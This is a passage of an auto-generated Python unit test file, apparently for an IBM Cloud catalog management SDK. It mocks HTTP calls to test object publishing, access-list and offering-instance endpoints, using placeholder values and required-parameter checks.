assert req_body['updated'] == "2019-01-01T12:00:00Z"
assert req_body['short_description'] == 'testString'
assert req_body['short_description_i18n'] == 'testString'
assert req_body['kind'] == 'testString'
assert req_body['publish'] == publish_object_model
assert req_body['state'] == state_model
assert req_body['catalog_id'] == 'testString'
assert req_body['catalog_name'] == 'testString'
assert req_body['data'] == {}
@responses.activate
def test_replace_object_required_params(self):
"""
test_replace_object_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString')
mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Invoke method
response = _service.replace_object(
catalog_identifier,
object_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_replace_object_value_error(self):
"""
test_replace_object_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString')
mock_response = '{"id": "id", "name": "name", "_rev": "rev", "crn": "crn", "url": "url", "parent_id": "parent_id", "label_i18n": "label_i18n", "label": "label", "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "short_description_i18n": "short_description_i18n", "kind": "kind", "publish": {"permit_ibm_public_publish": false, "ibm_approved": true, "public_approved": false, "portal_approval_record": "portal_approval_record", "portal_url": "portal_url"}, "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "catalog_id": "catalog_id", "catalog_name": "catalog_name", "data": {"mapKey": {"anyKey": "anyValue"}}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"object_identifier": object_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.replace_object(**req_copy)
class TestDeleteObject():
"""
Test Class for delete_object
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_delete_object_all_params(self):
"""
delete_object()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString')
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Invoke method
response = _service.delete_object(
catalog_identifier,
object_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_delete_object_value_error(self):
"""
test_delete_object_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString')
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"object_identifier": object_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.delete_object(**req_copy)
class TestGetObjectAudit():
"""
Test Class for get_object_audit
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_object_audit_all_params(self):
"""
get_object_audit()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/audit')
mock_response = '{"list": [{"id": "id", "created": "2019-01-01T12:00:00.000Z", "change_type": "change_type", "target_type": "target_type", "target_id": "target_id", "who_delegate_email": "who_delegate_email", "message": "message"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Invoke method
response = _service.get_object_audit(
catalog_identifier,
object_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_object_audit_value_error(self):
"""
test_get_object_audit_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/audit')
mock_response = '{"list": [{"id": "id", "created": "2019-01-01T12:00:00.000Z", "change_type": "change_type", "target_type": "target_type", "target_id": "target_id", "who_delegate_email": "who_delegate_email", "message": "message"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"object_identifier": object_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_object_audit(**req_copy)
class TestAccountPublishObject():
"""
Test Class for account_publish_object
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_account_publish_object_all_params(self):
"""
account_publish_object()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/account-publish')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Invoke method
response = _service.account_publish_object(
catalog_identifier,
object_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 202
@responses.activate
def test_account_publish_object_value_error(self):
"""
test_account_publish_object_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/account-publish')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"object_identifier": object_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.account_publish_object(**req_copy)
class TestSharedPublishObject():
"""
Test Class for shared_publish_object
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_shared_publish_object_all_params(self):
"""
shared_publish_object()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/shared-publish')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Invoke method
response = _service.shared_publish_object(
catalog_identifier,
object_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 202
@responses.activate
def test_shared_publish_object_value_error(self):
"""
test_shared_publish_object_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/shared-publish')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"object_identifier": object_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.shared_publish_object(**req_copy)
class TestIbmPublishObject():
"""
Test Class for ibm_publish_object
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_ibm_publish_object_all_params(self):
"""
ibm_publish_object()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/ibm-publish')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Invoke method
response = _service.ibm_publish_object(
catalog_identifier,
object_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 202
@responses.activate
def test_ibm_publish_object_value_error(self):
"""
test_ibm_publish_object_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/ibm-publish')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"object_identifier": object_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.ibm_publish_object(**req_copy)
class TestPublicPublishObject():
"""
Test Class for public_publish_object
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_public_publish_object_all_params(self):
"""
public_publish_object()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/public-publish')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Invoke method
response = _service.public_publish_object(
catalog_identifier,
object_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 202
@responses.activate
def test_public_publish_object_value_error(self):
"""
test_public_publish_object_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/public-publish')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"object_identifier": object_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.public_publish_object(**req_copy)
class TestCreateObjectAccess():
"""
Test Class for create_object_access
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_create_object_access_all_params(self):
"""
create_object_access()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access/testString')
responses.add(responses.POST,
url,
status=201)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
account_identifier = 'testString'
# Invoke method
response = _service.create_object_access(
catalog_identifier,
object_identifier,
account_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
@responses.activate
def test_create_object_access_value_error(self):
"""
test_create_object_access_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access/testString')
responses.add(responses.POST,
url,
status=201)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
account_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"object_identifier": object_identifier,
"account_identifier": account_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.create_object_access(**req_copy)
class TestGetObjectAccess():
"""
Test Class for get_object_access
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_object_access_all_params(self):
"""
get_object_access()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access/testString')
mock_response = '{"id": "id", "account": "account", "catalog_id": "catalog_id", "target_id": "target_id", "create": "2019-01-01T12:00:00.000Z"}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
account_identifier = 'testString'
# Invoke method
response = _service.get_object_access(
catalog_identifier,
object_identifier,
account_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_object_access_value_error(self):
"""
test_get_object_access_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access/testString')
mock_response = '{"id": "id", "account": "account", "catalog_id": "catalog_id", "target_id": "target_id", "create": "2019-01-01T12:00:00.000Z"}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
account_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"object_identifier": object_identifier,
"account_identifier": account_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_object_access(**req_copy)
class TestDeleteObjectAccess():
"""
Test Class for delete_object_access
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_delete_object_access_all_params(self):
"""
delete_object_access()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access/testString')
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
account_identifier = 'testString'
# Invoke method
response = _service.delete_object_access(
catalog_identifier,
object_identifier,
account_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_delete_object_access_value_error(self):
"""
test_delete_object_access_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access/testString')
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
account_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"object_identifier": object_identifier,
"account_identifier": account_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.delete_object_access(**req_copy)
class TestGetObjectAccessList():
"""
Test Class for get_object_access_list
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_object_access_list_all_params(self):
"""
get_object_access_list()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "account": "account", "catalog_id": "catalog_id", "target_id": "target_id", "create": "2019-01-01T12:00:00.000Z"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
limit = 1000
offset = 38
# Invoke method
response = _service.get_object_access_list(
catalog_identifier,
object_identifier,
limit=limit,
offset=offset,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'limit={}'.format(limit) in query_string
assert 'offset={}'.format(offset) in query_string
@responses.activate
def test_get_object_access_list_required_params(self):
"""
test_get_object_access_list_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "account": "account", "catalog_id": "catalog_id", "target_id": "target_id", "create": "2019-01-01T12:00:00.000Z"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Invoke method
response = _service.get_object_access_list(
catalog_identifier,
object_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_object_access_list_value_error(self):
"""
test_get_object_access_list_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "account": "account", "catalog_id": "catalog_id", "target_id": "target_id", "create": "2019-01-01T12:00:00.000Z"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"object_identifier": object_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_object_access_list(**req_copy)
class TestDeleteObjectAccessList():
"""
Test Class for delete_object_access_list
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_delete_object_access_list_all_params(self):
"""
delete_object_access_list()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access')
mock_response = '{"errors": {"mapKey": "inner"}}'
responses.add(responses.DELETE,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
accounts = ['testString']
# Invoke method
response = _service.delete_object_access_list(
catalog_identifier,
object_identifier,
accounts,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body == accounts
@responses.activate
def test_delete_object_access_list_value_error(self):
"""
test_delete_object_access_list_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access')
mock_response = '{"errors": {"mapKey": "inner"}}'
responses.add(responses.DELETE,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
accounts = ['testString']
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"object_identifier": object_identifier,
"accounts": accounts,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.delete_object_access_list(**req_copy)
class TestAddObjectAccessList():
"""
Test Class for add_object_access_list
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_add_object_access_list_all_params(self):
"""
add_object_access_list()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access')
mock_response = '{"errors": {"mapKey": "inner"}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
accounts = ['testString']
# Invoke method
response = _service.add_object_access_list(
catalog_identifier,
object_identifier,
accounts,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body == accounts
@responses.activate
def test_add_object_access_list_value_error(self):
"""
test_add_object_access_list_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access')
mock_response = '{"errors": {"mapKey": "inner"}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
object_identifier = 'testString'
accounts = ['testString']
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
"object_identifier": object_identifier,
"accounts": accounts,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.add_object_access_list(**req_copy)
# endregion
##############################################################################
# End of Service: Objects
##############################################################################
##############################################################################
# Start of Service: Instances
##############################################################################
# region
class TestCreateOfferingInstance():
"""
Test Class for create_offering_instance
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_create_offering_instance_all_params(self):
"""
create_offering_instance()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/instances/offerings')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Construct a dict representation of a OfferingInstanceLastOperation model
offering_instance_last_operation_model = {}
offering_instance_last_operation_model['operation'] = 'testString'
offering_instance_last_operation_model['state'] = 'testString'
offering_instance_last_operation_model['message'] = 'testString'
offering_instance_last_operation_model['transaction_id'] = 'testString'
offering_instance_last_operation_model['updated'] = 'testString'
# Set up parameter values
x_auth_refresh_token = 'testString'
id = 'testString'
rev = 'testString'
url = 'testString'
crn = 'testString'
label = 'testString'
catalog_id = 'testString'
offering_id = 'testString'
kind_format = 'testString'
version = 'testString'
cluster_id = 'testString'
cluster_region = 'testString'
cluster_namespaces = ['testString']
cluster_all_namespaces = True
schematics_workspace_id = 'testString'
resource_group_id = 'testString'
install_plan = 'testString'
channel = 'testString'
metadata = {}
last_operation = offering_instance_last_operation_model
# Invoke method
response = _service.create_offering_instance(
x_auth_refresh_token,
id=id,
rev=rev,
url=url,
crn=crn,
label=label,
catalog_id=catalog_id,
offering_id=offering_id,
kind_format=kind_format,
version=version,
cluster_id=cluster_id,
cluster_region=cluster_region,
cluster_namespaces=cluster_namespaces,
cluster_all_namespaces=cluster_all_namespaces,
schematics_workspace_id=schematics_workspace_id,
resource_group_id=resource_group_id,
install_plan=install_plan,
channel=channel,
metadata=metadata,
last_operation=last_operation,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['id'] == 'testString'
assert req_body['_rev'] == 'testString'
assert req_body['url'] == 'testString'
assert req_body['crn'] == 'testString'
assert req_body['label'] == 'testString'
assert req_body['catalog_id'] == 'testString'
assert req_body['offering_id'] == 'testString'
assert req_body['kind_format'] == 'testString'
assert req_body['version'] == 'testString'
assert req_body['cluster_id'] == 'testString'
assert req_body['cluster_region'] == 'testString'
assert req_body['cluster_namespaces'] == ['testString']
assert req_body['cluster_all_namespaces'] == True
assert req_body['schematics_workspace_id'] == 'testString'
assert req_body['resource_group_id'] == 'testString'
assert req_body['install_plan'] == 'testString'
assert req_body['channel'] == 'testString'
assert req_body['metadata'] == {}
assert req_body['last_operation'] == offering_instance_last_operation_model
@responses.activate
def test_create_offering_instance_required_params(self):
"""
test_create_offering_instance_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/instances/offerings')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
x_auth_refresh_token = 'testString'
# Invoke method
response = _service.create_offering_instance(
x_auth_refresh_token,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 201
@responses.activate
def test_create_offering_instance_value_error(self):
"""
test_create_offering_instance_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/instances/offerings')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=201)
# Set up parameter values
x_auth_refresh_token = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"x_auth_refresh_token": x_auth_refresh_token,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.create_offering_instance(**req_copy)
class TestGetOfferingInstance():
"""
Test Class for get_offering_instance
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_offering_instance_all_params(self):
"""
get_offering_instance()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/instances/offerings/testString')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
instance_identifier = 'testString'
# Invoke method
response = _service.get_offering_instance(
instance_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_offering_instance_value_error(self):
"""
test_get_offering_instance_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/instances/offerings/testString')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
instance_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"instance_identifier": instance_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_offering_instance(**req_copy)
class TestPutOfferingInstance():
"""
Test Class for put_offering_instance
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_put_offering_instance_all_params(self):
"""
put_offering_instance()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/instances/offerings/testString')
